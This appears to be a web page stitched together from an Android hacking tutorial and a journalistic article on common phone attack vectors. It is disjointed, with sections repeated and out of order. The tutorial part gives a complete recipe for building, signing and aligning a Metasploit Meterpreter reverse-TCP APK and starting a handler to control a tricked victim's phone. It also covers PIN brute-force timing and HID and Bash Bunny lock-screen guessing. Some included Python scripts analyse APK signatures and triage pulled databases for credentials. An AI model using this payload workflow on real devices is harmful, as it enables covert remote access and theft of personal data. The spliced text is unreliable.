
The number of passwords:

A 4-digit numeric lock accepts every value from 0000 to 9999, so the search space is 10^4 = 10,000 PINs (ten possible digits per position, raised to the number of positions).

Possibility #1 (a 30 second delay after every 5 wrong PINs):

total delays
10,000 / 5 = 2,000 delays
total time (ignoring the time it takes to type each PIN)
2,000 * 30 = 60,000 sec
or
1,000 min
or
about 16.7 hours

Possibility #2: a 30 second delay after every 41 wrong PINs.

total delays
10,000 / 41 = 243.9 delays
total time consumed
243.9 * 30 = 7,317 sec
or
7,317 / 60 = 122 min
or
about 2.0 hours

So a fixed 30 second timeout on its own does not put a 4-digit PIN out of reach: the whole space falls in well under a day, and both figures above still ignore the seconds needed to key in each guess. What makes a lock-screen brute force impractical is the search space (a 6-digit PIN has 10^6 values, an alphanumeric passcode far more) combined with the escalating timeouts most current phones apply after repeated failures and the option to wipe the device after a set number of wrong attempts.
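To make the arithmetic above reusable, here is an added example, my code rather than anything from the original post, that computes the worst-case time for any PIN length and lockout policy, including an escalating lockout like the ones current phones apply. The lockout policies plugged in are assumptions for illustration, not measurements of a particular device, and the function counts exactly (the correct PIN is the last one tried, so there is one lockout fewer than the space divided by the attempts per lockout), which is why it reports 59,970 rather than 60,000 seconds for the first scenario.

```python
"""Worst-case time for an online PIN brute force under a lockout policy.

Added example, not from the original post. The lockout policies used in
main() are assumptions for illustration, not measurements of a real phone.
"""


def brute_force_seconds(space, fails_per_lockout, lockout_s, entry_s=0.0,
                        escalate=1.0, max_lockout_s=None):
    """Seconds to exhaust `space` candidate PINs when every `fails_per_lockout`
    consecutive failures trigger a lockout of `lockout_s` seconds.

    Worst case: the correct PIN is tried last, so there are space - 1 failures.
    entry_s        seconds to key in one candidate (0 reproduces the post's
                   model, which counts only the lockouts)
    escalate       factor applied to the lockout after each one (1.0 = fixed)
    max_lockout_s  cap on an escalated lockout (None = no cap)
    """
    lockouts = (space - 1) // fails_per_lockout
    total = space * entry_s
    if escalate == 1.0:
        return total + lockouts * lockout_s      # closed form, no loop even for 10**8 PINs
    cap = float("inf") if max_lockout_s is None else float(max_lockout_s)
    delay = min(float(lockout_s), cap)
    for _ in range(lockouts):
        total += delay
        delay = min(delay * escalate, cap)
    return total


def fmt_duration(seconds):
    """Render seconds in the largest unit that fits, e.g. 59970 -> '16.7 hours'."""
    for unit, size in (("years", 365.25 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.0f} seconds"


def report(scenarios):
    """[(label, seconds, human readable)] for a list of (label, kwargs) pairs."""
    rows = []
    for label, kw in scenarios:
        secs = brute_force_seconds(**kw)
        rows.append((label, secs, fmt_duration(secs)))
    return rows


if __name__ == "__main__":
    scenarios = [
        # the post's two cases: 4-digit PIN, fixed 30 s lockout, typing time ignored
        ("4-digit, lockout after 5", dict(space=10**4, fails_per_lockout=5, lockout_s=30)),
        ("4-digit, lockout after 41", dict(space=10**4, fails_per_lockout=41, lockout_s=30)),
        # same policy, but 2 s to key in each guess
        ("4-digit, 2 s per entry", dict(space=10**4, fails_per_lockout=5, lockout_s=30, entry_s=2)),
        # a 6-digit PIN multiplies the search space by 100
        ("6-digit, lockout after 5", dict(space=10**6, fails_per_lockout=5, lockout_s=30)),
        # assumed escalating policy: the lockout doubles each time, capped at one day
        ("4-digit, doubling lockout", dict(space=10**4, fails_per_lockout=5, lockout_s=30,
                                           escalate=2.0, max_lockout_s=86400)),
    ]
    for label, secs, pretty in report(scenarios):
        print(f"{label:28s} {secs:>14,.0f} s  = {pretty}")
```

Running the script prints the two scenarios above, the same policy with 2 seconds of typing per guess, a 6-digit PIN, and a doubling lockout capped at one day; that last policy turns 16.7 hours into a little over five years, which is what lockout escalation is there to do.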

Payloads

A payload is the code that runs on the target once it has been delivered. Here the payload is an Android .apk: if the victim can be tricked into allowing installs from unknown sources and installing it, the app makes a reverse connection to a Meterpreter listener, which then controls the device through that connection.


Meterpreter reverse TCP payload creation command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your IP> LPORT=4444 R > android_shell.apk

-p selects the payload. LHOST is the IP address of your machine, which the victim's phone will connect back to (check it with ifconfig or ip addr); the phone has to be able to reach that address. LPORT is the port the handler listens on (4444 here). R asks for raw output, which for an Android payload is an .apk, so redirect it into a file with the .apk extension.

The .apk has to carry a signature before Android will install it: the package installer rejects an unsigned package outright. Signing gives the app an identity (the signing key), nothing more; it does not make the file look benign to an antivirus. A self-signed certificate is enough, which is what the steps below create.

To sign the .apk, you need three tools:

  • keytool (ships with the Java JDK)

  • jarsigner (ships with the Java JDK)

  • zipalign (Android SDK build-tools; Debian and Ubuntu also package it)

Create a keystore with keytool, then sign the .apk with jarsigner:

keytool -genkey -v -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

keytool prompts for a keystore password and the certificate's name fields; jarsigner asks for the same password. jarsigner produces only a v1 (JAR) signature, which older Android versions accept; apps targeting API 30 or later also need a v2 signature, which apksigner from the Android build-tools produces (apksigner runs after zipalign, whereas jarsigner has to run before it). SHA1withRSA/SHA1 is what the original post used; -sigalg SHA256withRSA -digestalg SHA-256 works with the same command.

Verify the signature with jarsigner:

jarsigner -verify -verbose -certs android_shell.apk

Install and use zipalign:

sudo apt-get install zipalign
or
sudo apt install zipalign

zipalign -v 4 android_shell.apk signed_aligned.apk

zipalign writes a new file and refuses to overwrite its input, so give it a different output name; signed_aligned.apk is the file to deliver. zipalign -c -v 4 signed_aligned.apk checks an existing file without changing it.

Now start a handler in the Metasploit console to receive the connection:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <your IP>
set LPORT 4444
run

LHOST and LPORT must match the values baked into the .apk. When the victim opens the app, the handler reports a Meterpreter session. That session runs with the permissions the app was granted at install time, not as root: it can pull the files, contacts, SMS, camera and location that those permissions cover, which is usually all an attacker needs, but it is not full control of the system.
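To show what jarsigner -verify and zipalign -c actually check, here is an added example (my code, not part of the original post and not produced by msfvenom) that inspects an APK as the zip file it is: it parses META-INF/MANIFEST.MF and recomputes the per-file digest that the v1 (JAR) signature covers, which is the layer that detects any change to the package after signing, and it checks the 4-byte alignment of uncompressed entries that zipalign enforces. The sample APK, its file names and its .SF/.RSA signature stubs are constructed inside the script; the PKCS#7 signature block itself is not verified here, that part is what jarsigner and apksigner do.

```python
"""Inspect an APK (a zip) the way the v1 (JAR) signing scheme and zipalign see it.

Added example, not from the original post. The v1 scheme stores a digest of each
file in META-INF/MANIFEST.MF, a digest of that manifest in a .SF file and a PKCS#7
signature block in a .RSA/.DSA/.EC file. This checks the per-file digests and the
4-byte alignment of uncompressed entries; it does not check the PKCS#7 block.
"""
import base64
import hashlib
import io
import struct
import zipfile

DIGESTS = {"SHA-256-Digest": hashlib.sha256,   # jarsigner default on current JDKs
           "SHA1-Digest": hashlib.sha1}        # what -digestalg SHA1 writes


def parse_manifest(text):
    """Split a JAR manifest into {entry name: {header: value}} (per-entry sections)."""
    sections, current, last = {}, {}, None
    for line in text.replace("\r\n", "\n").split("\n") + [""]:
        if line == "":                        # a blank line closes a section
            if "Name" in current:
                sections[current["Name"]] = current
            current, last = {}, None
        elif line.startswith(" ") and last:   # continuation of a value wrapped at 72 bytes
            current[last] += line[1:]
        else:
            key, _, value = line.partition(": ")
            current[key], last = value, key
    return sections


def v1_manifest_status(apk_bytes):
    """Return (has_v1_signature_files, entries whose digest is missing or wrong)."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        meta = [n for n in names if n.startswith("META-INF/")]
        signed = ("META-INF/MANIFEST.MF" in names
                  and any(n.endswith(".SF") for n in meta)
                  and any(n.upper().endswith((".RSA", ".DSA", ".EC")) for n in meta))
        if not signed:
            return False, []
        manifest = parse_manifest(z.read("META-INF/MANIFEST.MF").decode())
        bad = []
        for n in names:
            if n.startswith("META-INF/") or n.endswith("/"):
                continue
            entry = manifest.get(n, {})
            header = next((h for h in DIGESTS if h in entry), None)
            if header is None:
                bad.append(n)                 # not covered by the signature at all
                continue
            actual = base64.b64encode(DIGESTS[header](z.read(n)).digest()).decode()
            if entry[header] != actual:
                bad.append(n)                 # content changed after signing
        return True, bad


def unaligned_entries(apk_bytes, alignment=4):
    """Uncompressed entries whose data does not start on a 4-byte boundary
    (what zipalign -c 4 reports; raw assets are mmapped, so they must be aligned)."""
    out = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for info in z.infolist():
            if info.compress_type != zipfile.ZIP_STORED or info.is_dir():
                continue
            # local file header is 30 bytes: name length at +26, extra length at +28
            name_len, extra_len = struct.unpack_from("<HH", apk_bytes, info.header_offset + 26)
            if (info.header_offset + 30 + name_len + extra_len) % alignment:
                out.append(info.filename)
    return out


def build_sample_apk(sign=True, tamper=False, align=True):
    """Construct a toy APK in memory; every entry is stored uncompressed."""
    files = {"AndroidManifest.xml": b"<manifest/>",
             "classes.dex": b"dex\n035\x00" + b"\x00" * 64,
             "res/raw/payload.bin": b"constructed sample, not a real payload"}
    manifest = "Manifest-Version: 1.0\r\nCreated-By: example\r\n\r\n"
    for name, data in files.items():          # digests are taken before any tampering
        digest = base64.b64encode(hashlib.sha256(data).digest()).decode()
        manifest += f"Name: {name}\r\nSHA-256-Digest: {digest}\r\n\r\n"
    if tamper:
        files["res/raw/payload.bin"] = b"modified after signing"
    if sign:                                  # .SF and .RSA are stubs; only the manifest is real
        files["META-INF/MANIFEST.MF"] = manifest.encode()
        files["META-INF/HACKED.SF"] = b"Signature-Version: 1.0\r\n\r\n"
        files["META-INF/HACKED.RSA"] = b"\x30\x00"
    buf, offset = io.BytesIO(), 0
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in files.items():
            info = zipfile.ZipInfo(name)
            info.compress_type = zipfile.ZIP_STORED
            pad = (-(offset + 30 + len(name))) % 4 if align else 0
            info.extra = b"\x00" * pad        # zero padding in the extra field, as old zipalign did
            z.writestr(info, data)
            offset += 30 + len(name) + pad + len(data)
    return buf.getvalue()
```

v1_manifest_status(open("signed_aligned.apk", "rb").read()) does the same on a real APK. An entry shows up in the second element of the result whenever its content no longer matches the manifest, which is exactly what happens if you edit anything inside the .apk after signing, and why such edits have to be followed by signing again and then re-aligning.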

Factory Reset

A flashed phone is one whose original ROM has been replaced by a different operating system image. Phones are often flashed to appear unlocked when they are in fact still carrier-branded devices. A factory reset is a different thing: it wipes user data and settings and returns the phone to its shipped state without replacing the ROM.

Every phone has its own way to trigger a factory reset; the most common is a combination of the volume buttons and the power button. For example, I have an old Oppo phone for which the factory reset combination is the volume-down button and the power button held for 5 seconds, and the phone is flashed.

Bypass

Bypass is the method used by law enforcement agencies (the CIA and FBI, and in India the IB and RAW), using a special device such as the one shown in the picture.

This kind of attack depends on a device such as the IP-BOX, which brute-forces the lock screen PIN of the target phone. It is used mostly by law enforcement to get into the phones of terrorists, cybercriminals and other criminals.

Another option is the Bash Bunny from Hak5, a small computer that plugs in over USB and can present itself as a keyboard or a network adapter; scripted, it types PIN guesses at the lock screen for you. Automation removes the tedium but not the lockouts, so the timing worked out above still applies.

Mobile security often beats PCs, but users can still be fooled and smartphones can still be hacked. Here’s what you need to watch for.

The number of passwords: 10^4
or
10,000 PINs in total (0000 to 9999)


The methods attackers use to exploit Android phones keep multiplying, and new vulnerabilities are found all the time. Below are a few ways to hack Android phones:

  • HID (Human Interface Device) Attack

  • Password BruteForce

  • Payloads (Custom hacking scripts)

  • Factory Reset

  • Bypass

HID

In an HID attack the attacker uses a device that presents itself to the phone as a keyboard: a USB Rubber Ducky, or another phone or a microcontroller programmed to behave like one. Once plugged in, it types commands faster than any person could, usually to fetch and run a payload built with a toolkit such as SET (Social Engineering Toolkit) or Metasploit.

In such an attack, the hacker installs a backdoor and uses it to download the target's information.

With that information, he can either get into the person's bank account or sell it on the dark web.

You can see how an HID attack is conducted on the android infosec channel.

Login Bruteforce

A brute-force attack uses the trial and error method to guess the correct password of the phone.

Some important points to consider to conduct such an attack:

  • Number of passwords

  • The timeout

  • The time it might take

The timeout:

The lockout policy decides how often you are made to wait. Three policies are compared below:

After 5 wrong PINs - 30 sec delay (what the stock Android lock screen does)
After 1 wrong PIN - 30 sec delay
After 41 wrong PINs - 30 sec delay

Time consumed:

Let's work through some scenarios:

Possibility #1: a 30 second delay after every 5 wrong PINs. First work out how many delays occur, then the total time consumed.

The smartphone revolution was supposed to provide a second chance for the tech industry to roll out a secure computing platform. These new devices were purported to be locked down and immune to malware, unlike buggy PCs and vulnerable servers.

But it turns out that phones are still computers and their users are still people, and computers and people will always be weak links. We spoke to a number of security experts to help you get a sense of the most common ways attackers might go about breaking into the powerful computers in your users’ pockets. This should hopefully give you perspective on potential vulnerabilities.

7 ways to hack a phone

  1. Social engineering

  2. Malvertising

  3. Smishing

  4. Malware

  5. Pretexting

  6. Breaking in via Bluetooth

  7. Man-in-the-middle Wi-Fi attacks

1. Social engineering

The easiest way for any hacker to break into any device is for the user to open the door themselves. Making that happen is easier said than done, of course, but it’s the goal of most forms of social engineering attacks.

Smartphone operating systems generally have stricter security regimes than PCs or servers, with application code running in a sandboxed mode that prevents it from escalating privileges and taking over the device. But that much vaunted security model, in which mobile users need to take affirmative action in order for code to access protected areas of the phone’s operating system or storage, has a drawback: it results in an abundance of pop-up messages that many of us learn to tune out. “Applications on mobile devices segregate permissions in order to protect the user from rogue apps having a free for all with your data,” says Catalino Vega III, Security Analyst at Kuma LLC. “The prompt becomes familiar: ‘Do you want to allow this application access to your photos?'”

“This really adds just a single step between the provisioning of that access to the application,” he continues. “And because of the way the user experience has conditioned the acceptance of most prompts as a gate to accessing functionality, most users will just allow the app access to whatever it is requesting. I think this may be something we are all guilty of at some point.”

2. Malvertising

One particularly important vector for these kinds of deceptive dialog boxes are so-called “malvertisements,” which piggyback onto the infrastructure developed for the mobile advertising ecosystem, whether in a browser or within an app.

“The goal is to get you to click on the advertisement,” says Chuck Everette, Director of Cybersecurity Advocacy at Deep Instinct. “They are trying to lure you in with something that will get you to click before you think—a knee-jerk reaction, or something that looks like an alert or warning.” The aim, he says, is to “try and scare you or tempt you into clicking on the link.”

One example he cites was a game called Durak, which would coax users into unlocking their Android phones by tricking them into turning off security features and installing other malicious applications. Far from being some dodgy off-label sideloaded app, Durak was available in the official Google Play marketplace. “67% of all malicious apps can be traced back to being downloaded from the Google Play store, while only 10% came from alternative third-party markets,” he explains. “Consumers on Google Play greatly rely on reviews from other users if the app is safe or not. This does not work.” In contrast, he says, “Apple closely inspects every app on its app store, which decreases the number of apps available—but greatly reduces apps that are reported to be malicious.”

3. Smishing

Another vector attackers use to get that all-important tappable link in front of their victims is SMS text messaging, with a whole different set of social engineering tricks in play; the practice is known as SMS phishing or smishing, and it snags the gullible and the high-powered alike.

“There are multiple ways that cybercriminals can utilize SMS phishing, depending on their intention and goal,” says Rasmus Holst, CRO of Wire. “If the objective is to install malware onto a device, then a file is usually attached accompanied by a message that tries to persuade the user to click and download it. For example, cybercriminals can impersonate someone trusted, such as an employer or manager asking an employee to review the attached document, laying a trap for a busy and unsuspecting victim. Two years ago, Jeff Bezos’ phone was hacked after he downloaded a single video file from a trusted contact. In some cases, hackers using zero-day exploits of mobile browsers can push a malicious file onto a phone without user consent as long as they click the link.”

4. Malware

If a hacker can’t trick you into clicking a button and unwittingly lowering your phone’s security barriers, they might seek out someone who’s already done so deliberately by jailbreaking their phone. Jailbreaking is seen by many as allowing users to better customize their device and install the apps of their choice from unofficial sources, but by its nature it relaxes the strict security sandboxing that keeps smartphones locked down.

“Hackers create applications that users would have a genuine interest in, such as a free VPN, with the intention of downloading malware onto unsuspecting users’ devices,” says David Schoenberger, founder and Chief Innovation Officer of Eclypses. “Once these malicious applications are downloaded onto a device, they detect whether that device has been rooted or jailbroken — and if so, they steal personally identifiable information and other sensitive data. Once a device has been jailbroken, the operating system becomes compromised, allowing easy access to passwords, chats, or other input data, such as bank or payment information.”

5. Pretexting

Finally, if the user won’t give up control of their device willingly, an attacker can go over their head to their mobile provider. You might remember the mid ’00s British media scandal in which tabloids used what they called “blagging” techniques to access the mobile voicemail boxes of celebrities and crime victims. This process, also known as pretexting, involves an attacker piecing together enough personal information about their victim to plausibly impersonate them in communications with their phone provider and thus getting access to the victim’s account.

The tabloids were just after scoops, but criminals can use the same techniques to do even more damage. “If successfully verified, the attacker convinces the phone carrier to transfer the victim’s phone number to a device they possess, in what’s known as a SIM swap,” says Adam Kohnke, Information Security Manager at the Infosec Institute. “Calls, texts, and access codes—like the second-factor authentication codes your bank or financial providers send to your phone via SMS—now go to the attacker and not you.”

6. Breaking in via Bluetooth

There are a pair of wireless attack vectors that hackers can use to breach phones without tricking anyone into giving up permissions. Both require physical proximity to the target but can sometimes be pulled off in public spaces. “The Bluetooth connection is one of the weak spots for a smartphone, and hackers often use special methods to connect to devices that operate on Bluetooth and hack them,” says Aleksandr Maklakov, a tech and security expert and CIO at MacKeeper. “This is a common hacking method because many people keep their Bluetooth connection on. If a Bluetooth connection is unregulated, hackers can get close to your smartphone and hack their way in without notice.”

7. Man-in-the-middle Wi-Fi attacks

Another potential wireless attack vector is a man-in-the-middle Wi-Fi attack. “Many people tend to connect their smartphones with the freely available public Wi-Fi whenever they get an opportunity,” explains Peter Baltazar, a cybersecurity expert and technical writer at MalwareFox.com. “This habit can lead to major trouble as clever hackers can intercept the connection and infiltrate the phone.” By intercepting communications, hackers can get a wealth of information without ever taking control of the user’s phone. (Communication that uses TLS 1.3 is much more difficult to intercept in this way, but that protocol still hasn’t been universally rolled out.)

They’ve broken in, now what?

Once an attacker has used one of the techniques outlined above to gain a foothold on a smartphone, what’s their next step? While smartphone OSes are ultimately derived from Unix-like systems, an attacker who’s managed to force a breach will find themselves in a very different environment from a PC or server, says Callum Duncan, director at Sencode Cybersecurity.

“Most apps interface with the operating system and other applications on what are essentially API calls,” he explains. “The kernels for iOS and Android are so vastly different from anything that would resemble their Unix base that shared exploits would be almost impossible. Command lines do exist for both devices but are only accessible at the highest level of privilege for both devices and can usually only be accessed by rooting or jailbreaking the device.”

But just because it’s hard doesn’t mean it’s impossible. “Exploits of that type do exist,” Duncan says. “Privilege escalation would be key to this process and working around inbuilt safety mechanisms would be hard, but any attacker with the ability to run code on a user’s device is doing just that — running code on a user’s device — so if they’re smart enough they could make that device do whatever they please.”

Caitlin Johanson, Director of the Application Security Center of Excellence at Coalfire, says that a surprising amount of sensitive data is accessible to attackers who gain a foothold on a device. “Data stores such as SQLite get created by installed apps and could contain everything from web request and response content to potentially sensitive information and cookies,” she explains. “Common weaknesses observed in both iOS and Android include caching of application data within memory (such as authentication credentials), as well as persistence of thumbnails or snapshots of the running application, which could inadvertently store sensitive information to the device. Sensitive information—most often left unencrypted—is found in abundance within browser cookie values, crash files, preference files, and web cache content created in easy-to-read formats stored right on the device.”

“The very tools created for development purposes are what makes it easier for an attacker to extract, interact with, or even modify this kind of data, such as adb on Android or iExplorer or plutil on iOS,” she continues. “Standard utilities can be used for the examination of any database files copied from the device, and if we run into the need to decrypt, there are tools like Frida to run scripts to decrypt stored values.”
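As an added example of the "standard utilities" step Johanson describes, not code from the article or from her, the script below triages an SQLite database copied from a device (adb pull on Android, iExplorer on iOS) using only the Python standard library: it walks every table, flags columns whose name suggests a credential and columns whose values look like tokens, and reports only those that actually hold data. The database, its tables and its values are constructed inline to stand in for an app's cookie and preference stores; the regexes are a starting heuristic, not a rule.

```python
"""Triage an SQLite database copied from a phone for credential-like columns.

Added example, not code from the article. The database, tables and values built
in build_sample_db() are constructed to stand in for an app's cookie and
preference stores; nothing here came off a real device.
"""
import os
import re
import sqlite3
import tempfile

# column names that usually hold secrets, and values that look like tokens
SENSITIVE_NAME = re.compile(r"pass|pwd|secret|token|cookie|session|auth|key|card|ssn", re.I)
TOKEN_VALUE = re.compile(r"^(eyJ[\w-]+\.[\w-]+\.[\w-]*|[A-Fa-f0-9]{32,}|[A-Za-z0-9+/_-]{40,}={0,2})$")


def _q(ident):
    """Quote an identifier taken from sqlite_master so odd table names stay safe."""
    return '"' + ident.replace('"', '""') + '"'


def sensitive_columns(db_path, sample=500):
    """Return (table, column, reason, non-empty rows) for every column that is
    either named like a secret or holds token-looking values. Empty columns are
    skipped, so a password_hash column nobody filled in does not distract."""
    hits = []
    con = sqlite3.connect(f"file:{db_path}?mode=ro", uri=True)   # never modify evidence
    try:
        tables = [r[0] for r in con.execute(
            "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
        for table in tables:
            for row in con.execute(f"PRAGMA table_info({_q(table)})"):
                col = row[1]
                values = [str(v[0]) for v in con.execute(
                    f"SELECT {_q(col)} FROM {_q(table)} WHERE {_q(col)} IS NOT NULL "
                    f"AND {_q(col)} != '' LIMIT {int(sample)}")]
                if not values:
                    continue
                if SENSITIVE_NAME.search(col):
                    hits.append((table, col, "name", len(values)))
                elif any(TOKEN_VALUE.match(v) for v in values):
                    hits.append((table, col, "value", len(values)))
    finally:
        con.close()
    return hits


def build_sample_db(path):
    """Constructed stand-in for a webview cookie store, a key/value preference
    store and an accounts table (all values are made up)."""
    con = sqlite3.connect(path)
    con.executescript("""
        CREATE TABLE cookies(host TEXT, name TEXT, value TEXT, secure INT);
        CREATE TABLE prefs(pref TEXT, val TEXT);
        CREATE TABLE accounts(id INT, email TEXT, auth_token TEXT, password_hash TEXT);
        INSERT INTO cookies VALUES ('bank.example', 'SESSIONID',
                                    'd41d8cd98f00b204e9800998ecf8427ed41d8cd9', 1);
        INSERT INTO prefs VALUES ('theme', 'dark');
        INSERT INTO prefs VALUES ('api_key', 'sk-constructed-sample-0123456789abcdefghijkl');
        INSERT INTO accounts VALUES (1, 'user@example.com', 'eyJ.constructed.token', NULL);
    """)
    con.commit()
    con.close()


def demo():
    """Build the constructed database in a temp file, triage it, remove it."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    try:
        build_sample_db(path)
        return sensitive_columns(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for table, col, reason, n in demo():
        print(f"{table}.{col}: flagged by {reason}, {n} non-empty rows")
```

Point sensitive_columns() at a pulled .db to use it for real. The cookie value is caught by its shape (a long hex string) even though the column is just called value, the preference store is caught the same way, auth_token is caught by name, and the empty password_hash column is left out; the read-only URI keeps the examination from touching the copy.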

Thick as thieves

We don’t mean to oversell how simple any of this is. Most users don’t jailbreak their phones, click smishing links, or give enhanced privileges to dodgy applications. Even when hackers do gain a foothold on a device, they’re often stymied by iOS and Android’s built-in security measures.

Perhaps more than any specific technique outlined here, the way to hack a smartphone is via sheer determination. “Attackers create highly repeatable and automated models that pick and pry at every angle of a mobile app or a new operating system version in hope of finding a weak point,” explains Hank Schless, Senior Manager at Security Solutions at Lookout. “Once they find an exploitable weakness, they try to use it to their advantage as quickly as possible before a fix is released.”

And if you can’t figure out how to breach a cell phone, well, maybe you can find a friend who can help. “Information sharing among cybercriminals most commonly occurs either on the dark web or in groups on encrypted chat platforms like Telegram,” Schless says. “Larger groups, such as those backed by nation-states, are encouraged to share code and exploits amongst each other with the hope that collective efforts will help create more successful malicious campaigns.” The good guys need to share intelligence too, because they clearly have their work cut out for them.
